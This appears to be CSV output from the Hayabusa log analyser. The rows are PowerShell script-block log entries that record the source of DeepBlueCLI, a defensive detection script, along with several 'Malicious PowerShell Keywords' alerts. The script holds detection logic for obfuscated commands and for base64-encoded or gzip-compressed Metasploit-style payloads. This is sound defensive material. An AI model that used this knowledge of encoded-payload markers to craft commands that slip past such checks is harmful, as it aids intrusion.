command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.672 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 
($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.682 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ 
write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.684 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:41.504 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many 
special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:41.506 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function 
Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:41.506 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:41.507 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:42.511 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:49.242 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" sysmon",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:49.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";ID=1,7} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:52.107 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:12:04.061 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:12:04.069 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{Logname=""Security"";ID=4688,4720,4728,4732,4625} -ErrorAction 
Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:12:09.520 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:13:28.641 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1 ..\sysmon1.evtx sysmon,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:13:28.657 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{path=""..\sysmon1.evtx"";ID=1,7} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:13:31.538 +09:00,SEC511,4104,info,,PwSh Scriptblock 